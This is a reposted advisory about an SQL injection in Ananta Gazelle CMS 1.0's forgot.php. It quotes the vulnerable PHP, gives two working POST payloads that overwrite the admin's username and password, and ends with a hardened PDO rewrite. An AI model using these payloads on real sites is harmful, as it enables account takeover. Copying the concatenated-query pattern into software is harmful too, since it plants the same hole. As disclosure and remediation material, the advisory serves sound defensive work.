
Ananta Gazelle CMS upload-form UPDATE statement injection and fix - Website Security

Source: 自学PHP网    Date: 2015-04-17 13:03


Title: Ananta Gazelle CMS - Update Statement SQL injection
Author: hackme
Download: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/
Affected version: 1.0 stable
Tested on: backbox 2.1
 
[Apologies in advance for my poor English]
 
[+] This injection does not let us read table contents, but it does let us run the UPDATE statement against the admin's username and password.
Since we cannot enter special characters such as the apostrophe, we cannot set the username and password to arbitrary values; instead we copy the value of a column that has a default value into the username and password columns.
So in practice we end up with:
    admin - username = 1
          - password = 1
[+] Vulnerable code analysis (forgot.php):
[CODE]
if (!empty($_POST) && !isset($_POST["loginform"])) {
    // form submitted, set a new activation key for this user (however don't set the user
    // to inactive, so no-one can block someone else's account)
    $sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";
    if ($_POST["activate"] <> "") {
        $sql = $sql."activate='".$_POST["activate"]."'";
    }
    $sql = $sql." WHERE email"."='".$_POST["email"]."'";
    // no validation of the table name or the email value before the query is built
    if (mysql_query($sql)) {
        // ... rest of the handler omitted in the original excerpt
    }
}
[/code]
[+] Default columns of the users table: number,name,pass,email,activate,active,admin,joindate,showemail
Risk level: high
[+] Vulnerable page: /ananta/forgot.php
[+] Set the admin username to "1" [POST data]
email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php
[+] Set the admin password to "1" [POST data]
email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php
[+] ...and more, if you want.
[+] Greetz To: MZ
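The title promises a fix, so here is a hardened rewrite of the forgot.php update, added as an example that is not the project's own patch. The table name is checked against a fixed allow-list (an identifier cannot be a bound parameter) and the values go through PDO prepared statements, so neither `table` nor `email` can change the structure of the query; the `$pdo` connection, the `$tableprefix` setting and the `setActivationKey` function name are assumptions.

```php
<?php
// Hardened version of the forgot.php UPDATE (added example, not Ananta's code).
// Assumes an existing PDO connection in $pdo and the configured $tableprefix.

// Only the table this form is allowed to touch; anything else is rejected outright.
const ALLOWED_TABLES = ['users'];

function setActivationKey(PDO $pdo, string $tableprefix, array $post): bool
{
    $table    = $post['table'] ?? '';
    $email    = $post['email'] ?? '';
    $activate = $post['activate'] ?? '';

    // 1. The table name is part of the SQL grammar, so it cannot be bound.
    //    Instead of interpolating $_POST["table"], match it against the allow-list.
    if (!in_array($table, ALLOWED_TABLES, true)) {
        return false;
    }

    // 2. Refuse an empty or malformed email: the original ran "WHERE email=''"
    //    and would update every row with an empty address.
    if ($email === '' || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }

    // 3. Nothing to do without a key; the original would have built "SET  WHERE ...".
    if ($activate === '') {
        return false;
    }

    // 4. Values are bound, never concatenated, so quote and comment characters are inert.
    $sql  = sprintf('UPDATE %s%s SET activate = :activate WHERE email = :email',
                    $tableprefix, $table);
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':activate', $activate, PDO::PARAM_STR);
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);

    return $stmt->execute();
}

if (!empty($_POST) && !isset($_POST['loginform'])) {
    $ok = setActivationKey($pdo, $tableprefix, $_POST);
}
```

With this version the payloads above are bound as the literal email and activation values, and the `table` field is rejected before any query is built.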
